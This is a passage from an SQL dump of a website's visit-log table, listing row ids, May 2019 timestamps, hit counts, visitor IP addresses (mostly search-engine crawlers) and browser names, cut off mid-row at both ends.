.181.75','other'),(424063,1559176063,1,1,0,0,'40.77.167.36','other'),(424064,1559176319,1,1,0,0,'66.249.73.7','chrome'),(424065,1559176369,1,1,0,0,'66.249.73.5','chrome'),(424066,1559176446,1,1,0,0,'40.77.167.35','other'),(424067,1559176789,1,1,0,0,'40.77.167.159','other'),(424068,1559176799,1,1,0,0,'95.108.213.50','other'),(424069,1559176917,1,1,0,0,'5.45.207.8','other'),(424070,1559178386,1,1,0,0,'40.77.167.35','other'),(424071,1559179132,1,1,0,0,'13.66.139.0','other'),(424072,1559179458,1,1,0,0,'66.249.73.5','chrome'),(424073,1559179978,1,1,0,0,'66.249.65.214','chrome'),(424074,1559180063,1,1,0,0,'5.255.253.25','other'),(424075,1559180146,1,1,0,0,'141.8.142.81','other'),(424076,1559180545,1,1,0,0,'91.209.11.236','other'),(424077,1559180667,2,2,0,0,'169.57.0.246','chrome'),(424078,1559181507,2,2,0,0,'207.46.13.115','other'),(424079,1559182404,2,2,0,0,'8.29.198.25','other'),(424080,1559182474,1,1,0,0,'207.46.13.115','other'),(424081,1559183114,1,1,0,0,'141.8.142.144','other'),(424082,1559183150,1,1,0,0,'87.250.224.107','other'),(424083,1559183163,1,1,0,0,'5.45.207.76','other'),(424084,1559183166,1,1,0,0,'95.108.181.54','other'),(424085,1559183175,1,1,0,0,'141.8.142.108','other'),(424086,1559183237,1,1,0,0,'87.250.224.65','other'),(424087,1559183696,1,1,0,0,'158.46.171.54','chrome'),(424088,1559184504,1,1,0,0,'40.77.167.99','other'),(424089,1559185029,1,1,0,0,'212.47.233.241','firefox'),(424090,1559185555,1,1,0,0,'66.249.65.214','chrome'),(424091,1559186011,2,2,0,0,'141.8.183.11','other'),(424092,1559186014,1,1,0,0,'66.249.65.212','chrome'),(424093,1559186279,1,1,0,0,'178.154.244.65','other'),(424094,1559186296,1,1,0,0,'93.158.166.7','other'),(424095,1559186515,1,1,0,0,'40.77.167.99','other'),(424096,1559187484,1,1,0,0,'66.249.65.216','chrome'),(424097,1559187714,1,1,0,0,'157.55.39.159','other'),(424098,1559188403,1,1,0,0,'66.249.73.5','chrome'),(424099,1559188757,1,1,0,0,'157.55.39.227','other'),(424100,1559189149,1,1,0,0,'5.45.207.8','other'),(424101,1559189225,1,1,0,0,'178.154.244.65','other'),(424102,1559189242,1,1,0,0,'141.8.142.191','other'),(424103,1559189960,3,3,0,0,'157.55.39.159','other'),(424104,1559190206,1,1,0,0,'66.249.73.7','chrome'),(424105,1559190386,1,1,0,0,'66.249.65.212','chrome'),(424106,1559191029,1,1,0,0,'66.249.65.214','chrome'),(424107,1559192002,1,1,0,0,'157.55.39.159','other'),(424108,1559192361,1,1,0,0,'95.108.181.54','other'),(424109,1559192424,1,1,0,0,'141.8.142.108','other'),(424110,1559192431,1,1,0,0,'66.249.65.216','chrome'),(424111,1559193254,1,1,0,0,'8.29.198.27','other'),(424112,1559193521,1,1,0,0,'8.29.198.25','other'),(424113,1559194343,1,1,0,0,'157.55.39.180','other'),(424114,1559194411,2,2,0,0,'66.249.65.216','chrome'),(424115,1559194584,1,1,0,0,'185.220.101.46','other'),(424116,1559194661,1,1,0,0,'66.249.73.9','chrome'),(424117,1559194780,1,1,0,0,'207.46.13.76','other'),(424118,1559194919,1,1,0,0,'178.154.244.11','other'),(424119,1559195644,1,1,0,0,'91.196.178.184','chrome'),(424120,1559195860,2,2,0,0,'66.249.65.216','chrome'),(424121,1559196160,1,1,0,0,'66.249.73.7','chrome'),(424122,1559196269,1,1,0,0,'178.154.244.21','other'),(424123,1559196470,1,1,0,0,'178.154.244.49','other'),(424124,1559197640,1,1,0,0,'157.55.39.159','other'),(424125,1559197884,1,1,0,0,'91.196.178.89','chrome'),(424126,1559198024,2,2,0,0,'157.55.39.180','other'),(424127,1559198716,1,1,0,0,'5.188.210.52','chrome'),(424128,1559198850,1,1,0,0,'91.196.177.46','firefox'),(424129,1559198908,2,2,0,0,'207.46.13.76','other'),(424130,1559199020,1,1,0,0,'66.249.65.212','chrome'),(424131,1559199128,1,1,0,0,'157.55.39.180','other'),(424132,1559199479,1,1,0,0,'66.249.65.216','chrome'),(424133,1559199857,2,2,0,0,'87.250.224.99','other'),(424134,1559199868,1,1,0,0,'141.8.142.38','other'),(424135,1559199931,1,1,0,0,'178.154.244.21','other'),(424136,1559199945,1,1,0,0,'178.154.244.49','other'),(424137,1559200145,1,1,0,0,'95.108.181.83','other'),(424138,1559200610,1,1,0,0,'5.45.207.79','other'),(424139,1559200918,1,1,0,0,'66.249.65.216','chrome'),(424140,1559201051,1,1,0,0,'157.55.39.84','other'),(424141,1559201320,1,1,0,0,'95.134.221.65','chrome'),(424142,1559201401,1,1,0,0,'37.9.113.103','other'),(424143,1559202178,1,1,0,0,'66.249.65.216','chrome'),(424144,1559202237,2,2,0,0,'66.249.65.214','chrome'),(424145,1559202713,1,1,0,0,'94.100.221.234','chrome'),(424146,1559203528,1,1,0,0,'66.249.65.216','chrome'),(424147,1559203696,1,1,0,0,'157.55.39.83','other'),(424148,1559203991,1,1,0,0,'141.8.132.16','other'),(424149,1559204000,1,1,0,0,'95.108.213.4','other'),(424150,1559204002,1,1,0,0,'13.66.139.0','other'),(424151,1559204017,1,1,0,0,'66.249.65.212','chrome'),(424152,1559204096,1,1,0,0,'8.29.198.25','other'),(424153,1559204376,1,1,0,0,'8.29.198.26','other'),(424154,1559205017,1,1,0,0,'66.249.65.214','chrome'),(424155,1559205416,2,2,0,0,'66.249.65.216','chrome'),(424156,1559206076,1,1,0,0,'91.196.178.77','chrome'),(424157,1559207016,1,1,0,0,'207.46.13.110','other'),(424158,1559207669,1,1,0,0,'87.250.224.118','other'),(424159,1559207822,1,1,0,0,'95.108.213.4','other'),(424160,1559207845,1,1,0,0,'37.9.113.148','other'),(424161,1559208069,1,1,0,0,'95.108.213.50','other'),(424162,1559208170,1,1,0,0,'157.55.39.85','other'),(424163,1559208558,1,1,0,0,'157.55.39.186','other'),(424164,1559208940,1,1,0,0,'141.8.142.108','other'),(424165,1559209526,1,1,0,0,'66.249.65.212','chrome'),(424166,1559210183,1,1,0,0,'157.55.39.186','other'),(424167,1559211121,1,1,0,0,'109.74.154.72','chrome'),(424168,1559211226,1,1,0,0,'46.211.1.95','chrome'),(424169,1559211284,1,1,0,0,'66.249.65.214','chrome'),(424170,1559211624,1,1,0,0,'5.45.207.79','other'),(424171,1559211690,1,1,0,0,'178.154.171.17','other'),(424172,1559211693,1,1,0,0,'213.180.203.23','other'),(424173,1559211702,2,2,0,0,'157.55.39.186','other'),(424174,1559211812,1,1,0,0,'37.9.113.148','other'),(424175,1559211906,1,1,0,0,'95.108.213.50','other'),(424176,1559212049,1,1,0,0,'178.154.171.69','other'),(424177,1559212188,1,1,0,0,'178.154.244.65','other'),(424178,1559213483,1,1,0,0,'66.249.73.5','chrome'),(424179,1559214097,3,3,0,0,'35.192.96.247','chrome'),(424180,1559214186,3,3,0,0,'34.66.149.246','chrome'),(424181,1559214211,3,3,0,0,'104.197.93.20','chrome'),(424182,1559214236,3,3,0,0,'35.238.92.128','chrome'),(424183,1559214244,1,1,0,0,'188.115.181.11','firefox'),(424184,1559214254,2,2,0,0,'35.226.149.125','chrome'),(424186,1559214271,3,3,0,0,'104.154.161.175','chrome'),(424187,1559214935,2,2,0,0,'8.29.198.26','other'),(424188,1559215566,1,1,0,0,'213.180.203.61','other'),(424189,1559215746,1,1,0,0,'87.250.224.65','other'),(424190,1559215765,1,1,0,0,'178.154.171.30','other'),(424191,1559215836,1,1,0,0,'207.46.13.75','other'),(424192,1559215847,1,1,0,0,'37.9.113.103','other'),(424193,1559215849,1,1,0,0,'213.180.203.17','other'),(424194,1559216013,1,1,0,0,'66.249.65.214','chrome'),(424195,1559216099,1,1,0,0,'91.202.144.106','chrome'),(424196,1559216272,1,1,0,0,'54.255.200.107','chrome'),(424197,1559216399,1,1,0,0,'141.8.142.108','other'),(424198,1559216616,1,1,0,0,'130.180.211.138','chrome'),(424199,1559216807,1,1,0,0,'95.135.212.121','chrome'),(424200,1559216992,1,1,0,0,'180.76.15.148','other'),(424201,1559217594,1,1,0,0,'66.249.73.7','chrome'),(424202,1559218045,1,1,0,0,'91.196.178.131','firefox'),(424203,1559218467,1,1,0,0,'207.46.13.67','other'),(424204,1559218757,1,1,0,0,'193.19.254.122','chrome'),(424205,1559219079,1,1,0,0,'176.9.9.94','other'),(424206,1559219090,1,1,0,0,'37.9.113.103','other'),(424207,1559219117,1,1,0,0,'95.108.213.4','other'),(424208,1559219182,1,1,0,0,'157.55.39.186','other'),(424209,1559219298,1,1,0,0,'141.8.142.191','other'),(424210,1559219300,1,1,0,0,'213.180.203.23','other'),(424211,1559219302,1,1,0,0,'66.249.65.212','chrome'),(424212,1559219303,1,1,0,0,'95.108.181.54','other'),(424213,1559219350,1,1,0,0,'178.154.171.17','other'),(424214,1559219384,1,1,0,0,'141.8.132.16','other'),(424215,1559219386,1,1,0,0,'87.250.224.81','other'),(424216,1559219898,1,1,0,0,'157.55.39.48','other'),(424217,1559220431,1,1,0,0,'66.249.65.214','chrome'),(424218,1559220450,1,1,0,0,'66.249.65.212','chrome'),(424219,1559220991,1,1,0,0,'180.76.15.143','other'),(424220,1559221045,1,1,0,0,'37.9.113.103','other'),(424221,1559221300,2,2,0,0,'66.249.65.216','chrome'),(424222,1559221352,1,1,0,0,'87.250.224.65','other'),(424223,1559221965,1,1,0,0,'213.180.203.23','other'),(424224,1559222035,1,1,0,0,'157.55.39.48','other'),(424225,1559222537,1,1,0,0,'207.46.13.67','other'),(424226,1559222611,1,1,0,0,'207.46.13.35','other'),(424227,1559222635,1,1,0,0,'207.46.13.75','other'),(424228,1559223430,1,1,0,0,'95.132.63.249','chrome'),(424229,1559223631,1,1,0,0,'178.251.107.35','chrome'),(424230,1559223686,1,1,0,0,'178.255.215.94','other'),(424231,1559224553,1,1,0,0,'37.9.113.148','other'),(424232,1559224571,1,1,0,0,'213.180.203.53','other'),(424233,1559224608,1,1,0,0,'37.9.113.103','other'),(424234,1559224908,1,1,0,0,'40.77.167.17','other'),(424235,1559224949,1,1,0,0,'40.77.167.26','other'),(424236,1559225809,1,1,0,0,'8.29.198.26','other'),(424237,1559226117,1,1,0,0,'8.29.198.27','other'),(424238,1559226548,1,1,0,0,'66.249.76.124','chrome'),(424239,1559226698,1,1,0,0,'66.249.65.214','chrome'),(424240,1559226919,1,1,0,0,'95.163.255.96','other'),(424241,1559227116,1,1,0,0,'157.55.39.48','other'),(424242,1559227155,2,2,0,0,'207.46.13.35','other'),(424243,1559227164,1,1,0,0,'141.8.142.162','other'),(424244,1559227534,1,1,0,0,'40.77.167.17','other'),(424245,1559227614,1,1,0,0,'95.163.255.94','other'),(424246,1559228126,1,1,0,0,'157.55.39.97','other'),(424247,1559228507,1,1,0,0,'157.55.39.48','other'),(424248,1559228787,1,1,0,0,'66.249.65.214','chrome'),(424249,1559229089,1,1,0,0,'207.46.13.16','other'),(424250,1559229158,1,1,0,0,'91.228.217.21','firefox'),(424251,1559229200,1,1,0,0,'178.154.171.30','other'),(424252,1559229645,1,1,0,0,'178.154.171.27','other'),(424253,1559230128,1,1,0,0,'66.249.65.214','chrome'),(424254,1559230844,1,1,0,0,'66.249.73.7','chrome'),(424255,1559231660,1,1,0,0,'93.73.160.193','firefox'),(424256,1559231954,1,1,0,0,'157.55.39.90','other'),(424257,1559232079,1,1,0,0,'157.55.39.97','other'),(424258,1559232143,1,1,0,0,'66.249.65.214','chrome'),(424259,1559232847,1,1,0,0,'207.46.13.35','other'),(424260,1559233174,1,1,0,0,'5.45.207.19','other'),(424261,1559233194,1,1,0,0,'37.9.113.20','other'),(424262,1559233211,1,1,0,0,'87.250.224.47','other'),(424263,1559233444,1,1,0,0,'66.249.65.214','chrome'),(424264,1559233566,1,1,0,0,'51.77.52.160','chrome'),(424265,1559234095,1,1,0,0,'66.249.73.9','chrome'),(424266,1559234299,1,1,0,0,'46.166.137.211','other'),(424267,1559235280,1,1,0,0,'157.55.39.97','other'),(424268,1559235574,1,1,0,0,'66.249.73.7','chrome'),(424269,1559235901,1,1,0,0,'5.255.253.16','other'),(424271,1559235983,1,1,0,0,'93.158.166.7','other'),(424272,1559236419,1,1,0,0,'157.55.39.97','other'),(424273,1559236667,2,2,0,0,'8.29.198.27','other'),(424274,1559237410,1,1,0,0,'207.46.13.113','other'),(424275,1559237832,2,2,0,0,'91.196.178.78','chrome'),(424276,1559238018,1,1,0,0,'5.45.207.79','other'),(424277,1559238023,1,1,0,0,'141.8.142.103','other'),(424278,1559238853,1,1,0,0,'5.45.207.19','other'),(424279,1559238924,5,5,0,0,'178.154.244.11','other'),(424280,1559238945,1,1,0,0,'5.45.207.79','other'),(424281,1559239252,1,1,0,0,'66.249.65.216','chrome'),(424282,1559240611,2,2,0,0,'40.77.167.204','other'),(424283,1559241182,1,1,0,0,'66.249.65.214','chrome'),(424284,1559241332,1,1,0,0,'66.249.65.216','chrome'),(424285,1559241445,1,1,0,0,'40.77.167.219','other'),(424286,1559241500,1,1,0,0,'40.77.167.17','other'),(424287,1559241671,1,1,0,0,'5.45.207.79','other'),(424288,1559241718,1,1,0,0,'95.108.181.57','other'),(424289,1559242201,1,1,0,0,'95.108.181.96','other'),(424290,1559242955,1,1,0,0,'141.8.132.16','other'),(424291,1559242962,1,1,0,0,'157.55.39.192','other'),(424292,1559243893,1,1,0,0,'40.77.167.219','other'),(424293,1559244478,1,1,0,0,'157.55.39.142','other'),(424294,1559244631,1,1,0,0,'141.8.142.81','other'),(424295,1559244654,1,1,0,0,'141.8.142.38','other'),(424296,1559244799,1,1,0,0,'209.17.96.66','other'),(424297,1559244975,1,1,0,0,'87.250.224.99','other'),(424298,1559245267,1,1,0,0,'40.77.167.219','other'),(424299,1559247079,1,1,0,0,'5.188.45.160','chrome'),(424300,1559247318,1,1,0,0,'5.45.207.76','other'),(424301,1559247384,1,1,0,0,'213.180.203.23','other'),(424302,1559247517,1,1,0,0,'8.29.198.25','other'),(424303,1559247533,1,1,0,0,'141.8.142.38','other'),(424304,1559247565,1,1,0,0,'5.255.253.16','other'),(424305,1559247820,1,1,0,0,'95.108.213.4','other'),(424306,1559247826,1,1,0,0,'8.29.198.27','other'),(424307,1559249649,1,1,0,0,'66.249.73.9','chrome'),(424308,1559250355,2,2,0,0,'95.108.181.57','other'),(424309,1559250389,1,1,0,0,'5.255.253.16','other'),(424310,1559250488,1,1,0,0,'5.255.253.25','other'),(424311,1559250515,1,1,0,0,'178.154.244.21','other'),(424312,1559250517,1,1,0,0,'178.154.200.8','other'),(424313,1559250796,1,1,0,0,'40.77.167.219','other'),(424314,1559251056,1,1,0,0,'40.77.167.140','other'),(424315,1559252541,1,1,0,0,'40.77.167.219','other'),(424316,1559253070,1,1,0,0,'66.249.73.5','chrome'),(424317,1559253090,1,1,0,0,'66.249.65.212','chrome'),(424318,1559253351,1,1,0,0,'180.76.15.29','other'),(424319,1559253398,1,1,0,0,'40.77.167.140','other'),(424320,1559253438,1,1,0,0,'87.250.224.47','other'),(424321,1559253678,2,2,0,0,'5.255.253.25','other'),(424322,1559253687,1,1,0,0,'37.9.113.148','other'),(424323,1559253857,1,1,0,0,'157.55.39.205','other'),(424324,1559254009,1,1,0,0,'5.255.253.16','other'),(424325,1559254021,1,1,0,0,'178.154.244.21','other'),(424326,1559254448,1,1,0,0,'213.180.203.23','other'),(424327,1559254639,1,1,0,0,'141.8.183.11','other'),(424328,1559254641,1,1,0,0,'178.154.244.49','other'),(424329,1559255655,1,1,0,0,'207.46.13.140','other'),(424330,1559256923,1,1,0,0,'5.255.253.25','other'),(424331,1559257662,1,1,0,0,'207.46.13.140','other'),(424332,1559258378,1,1,0,0,'8.29.198.27','other'),(424333,1559258690,1,1,0,0,'8.29.198.26','other'),(424334,1559258759,2,2,0,0,'66.249.66.220','chrome'),(424335,1559258919,1,1,0,0,'66.249.66.222','chrome'),(424336,1559259300,1,1,0,0,'95.163.255.96','other'),(424337,1559259560,1,1,0,0,'40.77.167.140','other'),(424338,1559260306,1,1,0,0,'95.163.255.93','other'),(424339,1559260515,1,1,0,0,'40.77.167.140','other'),(424340,1559260583,1,1,0,0,'207.46.13.140','other'),(424341,1559260649,1,1,0,0,'87.250.224.99','other'),(424342,1559260718,1,1,0,0,'141.8.142.38','other'),(424343,1559260752,1,1,0,0,'5.45.207.76','other'),(424344,1559262295,1,1,0,0,'207.46.13.140','other'),(424345,1559263634,1,1,0,0,'66.249.66.218','chrome'),(424346,1559263686,1,1,0,0,'157.55.39.228','other'),(424347,1559263691,1,1,0,0,'40.77.167.89','other'),(424348,1559263696,1,1,0,0,'157.55.39.205','other'),(424349,1559265051,1,1,0,0,'141.8.183.23','other'),(424350,1559265172,2,2,0,0,'157.55.39.205','other'),(424351,1559265321,1,1,0,0,'40.77.167.89','other'),(424352,1559266646,1,1,0,0,'213.180.203.40','other'),(424353,1559267298,1,1,0,0,'157.55.39.228','other'),(424354,1559268695,1,1,0,0,'213.180.203.17','other'),(424355,1559268716,1,1,0,0,'157.55.39.205','other'),(424356,1559269223,2,2,0,0,'8.29.198.25','other'),(424357,1559270370,1,1,0,0,'207.46.13.174','other'),(424358,1559271253,1,1,0,0,'207.46.13.140','other'),(424359,1559272671,1,1,0,0,'87.250.224.65','other'),(424360,1559272711,1,1,0,0,'95.108.181.54','other'),(424361,1559273010,1,1,0,0,'95.108.181.75','other'),(424362,1559273102,1,1,0,0,'213.180.203.23','other'),(424363,1559273249,1,1,0,0,'207.46.13.174','other'),(424364,1559273706,1,1,0,0,'66.249.66.218','chrome'),(424365,1559274773,1,1,0,0,'66.249.66.222','chrome'),(424366,1559274944,1,1,0,0,'207.46.13.140','other'),(424367,1559275264,1,1,0,0,'40.77.167.89','other'),(424368,1559276763,1,1,0,0,'141.8.183.11','other'),(424369,1559277412,1,1,0,0,'207.46.13.140','other'),(424370,1559278447,1,1,0,0,'66.249.66.132','chrome'),(424371,1559278571,1,1,0,0,'207.46.13.174','other'),(424372,1559279371,1,1,0,0,'40.77.167.89','other'),(424373,1559280060,1,1,0,0,'8.29.198.27','other'),(424374,1559280386,1,1,0,0,'8.29.198.26','other'),(424375,1559280563,1,1,0,0,'77.247.181.163','other'),(424376,1559280870,1,1,0,0,'87.250.224.118','other'),(424377,1559280887,1,1,0,0,'178.154.244.21','other'),(424378,1559281085,2,2,0,0,'178.154.171.24','other'),(424379,1559281195,1,1,0,0,'5.45.207.8','other'),(424380,1559282856,1,1,0,0,'5.45.207.79','other'),(424381,1559282918,1,1,0,0,'66.249.66.222','chrome'),(424382,1559283157,1,1,0,0,'207.46.13.174','other'),(424383,1559283924,1,1,0,0,'157.55.39.136','other'),(424384,1559283931,1,1,0,0,'66.249.66.218','chrome'),(424385,1559284373,1,1,0,0,'5.228.197.20','msie'),(424386,1559284847,1,1,0,0,'207.46.13.2','other'),(424387,1559285266,1,1,0,0,'157.55.39.241','other'),(424388,1559285794,1,1,0,0,'91.196.177.46','firefox'),(424389,1559285843,1,1,0,0,'178.154.244.49','other'),(424390,1559285886,1,1,0,0,'37.9.113.148','other'),(424391,1559286222,1,1,0,0,'95.108.213.50','other'),(424392,1559286300,1,1,0,0,'213.180.203.61','other'),(424393,1559286696,1,1,0,0,'109.201.154.248','other'),(424394,1559286750,1,1,0,0,'66.249.66.222','chrome'),(424395,1559287185,1,1,0,0,'207.46.13.27','other'),(424396,1559287190,1,1,0,0,'157.55.39.136','other'),(424397,1559287433,1,1,0,0,'141.8.142.38','other'),(424398,1559287700,1,1,0,0,'46.166.190.146','other'),(424399,1559288247,2,2,0,0,'66.249.66.220','chrome'),(424400,1559289839,1,1,0,0,'66.249.66.220','chrome'),(424401,1559289894,2,2,0,0,'66.249.66.218','chrome'),(424402,1559289940,1,1,0,0,'66.249.66.132','chrome'),(424403,1559290430,1,1,0,0,'91.196.178.169','firefox'),(424404,1559290483,1,1,0,0,'178.92.137.218','chrome'),(424405,1559290484,1,1,0,0,'66.249.66.130','chrome'),(424406,1559290689,1,1,0,0,'66.249.66.222','chrome'),(424407,1559290785,1,1,0,0,'46.211.133.14','chrome'),(424408,1559290903,1,1,0,0,'8.29.198.25','other'),(424409,1559291168,1,1,0,0,'91.196.177.65','chrome'),(424410,1559291236,1,1,0,0,'8.29.198.27','other'),(424411,1559291469,1,1,0,0,'66.249.66.130','chrome'),(424412,1559291578,1,1,0,0,'37.9.113.20','other'),(424413,1559291603,1,1,0,0,'213.180.203.9','other'),(424414,1559291745,1,1,0,0,'87.250.224.65','other'),(424415,1559291751,1,1,0,0,'5.45.207.79','other'),(424416,1559292417,1,1,0,0,'157.55.39.83','other'),(424417,1559292592,1,1,0,0,'141.8.142.191','other'),(424418,1559292717,1,1,0,0,'91.124.182.170','firefox'),(424419,1559293084,2,2,0,0,'66.249.66.218','chrome'),(424420,1559294124,1,1,0,0,'66.249.66.222','chrome'),(424421,1559294332,1,1,0,0,'91.196.178.43','chrome'),(424422,1559295323,1,1,0,0,'5.188.210.52','chrome'),(424423,1559295371,1,1,0,0,'207.46.13.2','other'),(424424,1559295546,1,1,0,0,'91.196.177.46','firefox'),(424425,1559295567,1,1,0,0,'91.196.178.89','chrome'),(424426,1559295649,1,1,0,0,'66.249.66.222','chrome'),(424427,1559295713,1,1,0,0,'157.55.39.136','other'),(424428,1559295785,1,1,0,0,'66.249.66.220','chrome'),(424429,1559296482,1,1,0,0,'66.249.66.128','chrome'),(424430,1559296827,1,1,0,0,'91.196.178.89','chrome'),(424431,1559296902,1,1,0,0,'95.108.181.75','other'),(424432,1559296930,2,2,0,0,'87.250.224.118','other'),(424433,1559297014,1,1,0,0,'95.108.213.50','other'),(424434,1559297212,2,2,0,0,'178.154.171.27','other'),(424435,1559297349,1,1,0,0,'87.250.224.65','other'),(424436,1559297864,1,1,0,0,'109.74.154.72','chrome'),(424437,1559298100,2,2,0,0,'207.46.13.205','other'),(424438,1559298108,1,1,0,0,'66.249.66.222','chrome'),(424439,1559298193,2,2,0,0,'66.249.66.220','chrome'),(424440,1559298852,1,1,0,0,'37.9.113.148','other'),(424441,1559299284,1,1,0,0,'66.249.66.220','chrome'),(424442,1559299290,1,1,0,0,'66.249.66.218','chrome'),(424443,1559299855,1,1,0,0,'209.17.96.242','other'),(424444,1559299983,2,2,0,0,'207.46.13.205','other'),(424445,1559300551,1,1,0,0,'66.249.66.222','chrome'),(424446,1559300574,3,3,0,0,'35.232.31.37','chrome'),(424447,1559300600,3,3,0,0,'35.232.205.229','chrome'),(424448,1559300625,3,3,0,0,'104.198.166.250','chrome'),(424449,1559300643,2,2,0,0,'34.66.10.231','chrome'),(424451,1559300655,1,1,0,0,'35.225.202.171','chrome'),(424452,1559300656,2,2,0,0,'35.225.202.171','chrome'),(424453,1559300680,3,3,0,0,'35.238.242.9','chrome'),(424454,1559300718,1,1,0,0,'66.249.66.128','chrome'),(424455,1559300764,1,1,0,0,'66.249.66.218','chrome'),(424456,1559300877,1,1,0,0,'66.249.66.220','chrome'),(424457,1559301502,1,1,0,0,'157.55.39.83','other'),(424458,1559301736,1,1,0,0,'141.8.142.38','other'),(424459,1559301758,2,2,0,0,'8.29.198.27','other'),(424460,1559302180,1,1,0,0,'5.45.207.76','other'),(424461,1559302220,1,1,0,0,'207.46.13.63','other'),(424462,1559302298,1,1,0,0,'5.45.207.79','other'),(424463,1559302347,1,1,0,0,'141.8.142.81','other'),(424464,1559302552,1,1,0,0,'157.55.39.83','other'),(424465,1559302721,1,1,0,0,'207.46.13.186','other'),(424466,1559303011,3,3,0,0,'66.249.66.218','chrome'),(424467,1559303057,1,1,0,0,'66.249.66.220','chrome'),(424468,1559303661,1,1,0,0,'66.249.66.222','chrome'),(424469,1559304345,1,1,0,0,'109.207.205.228','chrome'),(424470,1559304747,1,1,0,0,'66.249.66.220','chrome'),(424471,1559305326,1,1,0,0,'66.249.66.218','chrome'),(424472,1559305428,3,3,0,0,'66.249.66.222','chrome'),(424473,1559305479,1,1,0,0,'66.249.66.132','chrome'),(424474,1559305562,1,1,0,0,'207.46.13.63','other'),(424475,1559305628,1,1,0,0,'95.163.255.99','other'),(424476,1559305991,1,1,0,0,'95.108.181.83','other'),(424477,1559306350,1,1,0,0,'37.9.113.148','other'),(424478,1559306955,1,1,0,0,'66.249.66.132','chrome'),(424479,1559306960,2,2,0,0,'213.180.203.23','other'),(424480,1559307168,1,1,0,0,'141.8.142.38','other'),(424481,1559307685,2,2,0,0,'66.249.66.220','chrome'),(424482,1559307710,1,1,0,0,'66.249.66.218','chrome'),(424483,1559307842,1,1,0,0,'66.249.66.222','chrome'),(424484,1559308097,1,1,0,0,'212.22.214.6','chrome'),(424485,1559308401,1,1,0,0,'46.211.64.191','chrome'),(424486,1559308479,1,1,0,0,'91.196.178.102','chrome'),(424487,1559308567,1,1,0,0,'66.249.66.128','chrome'),(424488,1559308665,1,1,0,0,'46.211.124.251','chrome'),(424489,1559309146,1,1,0,0,'128.124.33.85','chrome'),(424490,1559309150,1,1,0,0,'95.108.181.94','other'),(424491,1559309304,1,1,0,0,'141.8.142.38','other'),(424492,1559309337,1,1,0,0,'141.8.142.191','other'),(424493,1559309339,1,1,0,0,'95.108.213.50','other'),(424494,1559309341,1,1,0,0,'213.180.203.53','other'),(424495,1559309342,1,1,0,0,'66.249.66.132','chrome'),(424496,1559309435,1,1,0,0,'157.55.39.67','other'),(424497,1559309473,1,1,0,0,'66.249.66.130','chrome'),(424498,1559309652,4,4,0,0,'66.249.66.220','chrome'),(424499,1559310363,1,1,0,0,'66.249.66.132','chrome'),(424500,1559311001,2,2,0,0,'66.249.66.222','chrome'),(424501,1559311893,1,1,0,0,'66.249.66.220','chrome'),(424502,1559311898,1,1,0,0,'66.249.66.218','chrome'),(424503,1559311918,1,1,0,0,'66.249.66.130','chrome'),(424504,1559312054,1,1,0,0,'66.249.66.222','chrome'),(424505,1559312174,1,1,0,0,'213.180.203.61','other'),(424506,1559312265,1,1,0,0,'5.45.207.79','other'),(424507,1559312276,1,1,0,0,'178.154.171.17','other'),(424508,1559312456,1,1,0,0,'178.154.171.69','other'),(424509,1559312605,1,1,0,0,'8.29.198.25','other'),(424510,1559312950,1,1,0,0,'8.29.198.26','other'),(424511,1559313177,1,1,0,0,'207.46.13.77','other'),(424512,1559313470,1,1,0,0,'87.250.224.107','other'),(424513,1559313627,1,1,0,0,'66.249.66.128','chrome'),(424514,1559313865,1,1,0,0,'66.249.66.222','chrome'),(424515,1559314196,1,1,0,0,'207.46.13.77','other'),(424516,1559314401,1,1,0,0,'157.55.39.100','other'),(424517,1559315220,1,1,0,0,'141.8.142.162','other'),(424518,1559315224,1,1,0,0,'141.8.142.103','other'),(424519,1559315294,1,1,0,0,'95.108.181.75','other'),(424520,1559315492,1,1,0,0,'178.154.171.30','other'),(424521,1559315732,2,2,0,0,'66.249.66.222','chrome'),(424522,1559315856,1,1,0,0,'40.77.167.173','other'),(424523,1559316083,3,3,0,0,'66.249.66.220','chrome'),(424524,1559316316,1,1,0,0,'157.55.39.100','other'),(424525,1559316403,1,1,0,0,'40.77.167.200','other'),(424526,1559317239,1,1,0,0,'157.55.39.100','other'),(424527,1559317411,1,1,0,0,'66.249.66.132','chrome'),(424528,1559317496,1,1,0,0,'66.249.66.220','chrome'),(424529,1559318526,6,6,0,0,'207.46.13.77','other'),(424530,1559318529,4,4,0,0,'157.55.39.100','other'),(424531,1559318539,5,5,0,0,'40.77.167.74','other'),(424532,1559318579,3,3,0,0,'40.77.167.25','other'),(424533,1559318943,1,1,0,0,'5.45.207.8','other'),(424534,1559318953,1,1,0,0,'66.249.66.220','chrome'),(424535,1559319103,1,1,0,0,'95.108.213.4','other'),(424536,1559319262,1,1,0,0,'213.180.203.23','other'),(424537,1559319391,1,1,0,0,'66.249.66.130','chrome'),(424538,1559320130,2,2,0,0,'66.249.66.218','chrome'),(424539,1559321410,1,1,0,0,'66.249.66.222','chrome'),(424540,1559321778,2,2,0,0,'66.249.66.128','chrome'),(424541,1559323249,1,1,0,0,'66.249.66.220','chrome'),(424542,1559323473,1,1,0,0,'8.29.198.26','other'),(424543,1559323796,1,1,0,0,'8.29.198.27','other'),(424544,1559324523,1,1,0,0,'66.249.66.128','chrome'),(424545,1559324674,1,1,0,0,'66.249.66.220','chrome'),(424546,1559324772,1,1,0,0,'193.106.30.98','firefox'),(424547,1559325006,1,1,0,0,'66.249.66.218','chrome'),(424548,1559326211,1,1,0,0,'40.77.167.120','other'),(424549,1559326477,1,1,0,0,'66.249.66.132','chrome'),(424550,1559326774,1,1,0,0,'95.163.255.96','other'),(424551,1559327009,1,1,0,0,'66.249.66.130','chrome'),(424552,1559327591,1,1,0,0,'66.249.66.218','chrome'),(424553,1559327978,1,1,0,0,'37.9.113.20','other'),(424554,1559328018,1,1,0,0,'5.45.207.8','other'),(424555,1559328054,1,1,0,0,'95.108.181.54','other'),(424556,1559328252,1,1,0,0,'95.108.181.83','other'),(424557,1559328407,2,2,0,0,'40.77.167.147','other'),(424558,1559328515,1,1,0,0,'87.250.224.99','other'),(424559,1559328919,1,1,0,0,'207.46.13.141','other'),(424560,1559328964,1,1,0,0,'178.154.244.65','other'),(424561,1559331756,1,1,0,0,'207.46.13.148','other'),(424562,1559332081,24,24,0,0,'69.30.211.2','other'),(424563,1559332233,183,183,0,0,'91.209.51.22','other'),(424564,1559332373,1,1,0,0,'128.124.33.85','chrome'),(424565,1559332485,2,2,0,0,'212.90.60.45','chrome'),(424566,1559332933,1,1,0,0,'66.249.66.222','chrome'),(424567,1559333409,1,1,0,0,'95.108.181.75','other'),(424568,1559333949,1,1,0,0,'213.180.203.23','other'),(424569,1559334022,1,1,0,0,'66.249.66.130','chrome'),(424570,1559334117,1,1,0,0,